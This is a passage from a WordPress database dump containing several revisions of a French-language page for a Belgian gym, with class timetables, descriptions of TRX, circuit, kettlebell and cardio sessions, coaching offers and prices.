class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:40:45', '2013-10-05 08:40:45', '', 11, 'http://www.crosstrainingcenter.be/11-revision-118/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(350, 1, '2013-10-05 08:51:08', '2013-10-05 08:51:08', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:51:08', '2013-10-05 08:51:08', '', 11, 'http://www.crosstrainingcenter.be/11-revision-121/', 0, 'revision', '', 0),
(352, 1, '2013-10-05 08:53:02', '2013-10-05 08:53:02', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n\r\n<span style=\"text-decoration: underline; background:#F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:53:02', '2013-10-05 08:53:02', '', 11, 'http://www.crosstrainingcenter.be/11-revision-123/', 0, 'revision', '', 0),
(353, 1, '2013-10-05 08:54:27', '2013-10-05 08:54:27', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n\r\n<span style=\"text-decoration: underline; background:#F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background:#E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:54:27', '2013-10-05 08:54:27', '', 11, 'http://www.crosstrainingcenter.be/11-revision-124/', 0, 'revision', '', 0),
(354, 1, '2013-10-05 08:55:15', '2013-10-05 08:55:15', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n\r\n<span style=\"text-decoration: underline; background:#F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background:#E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" 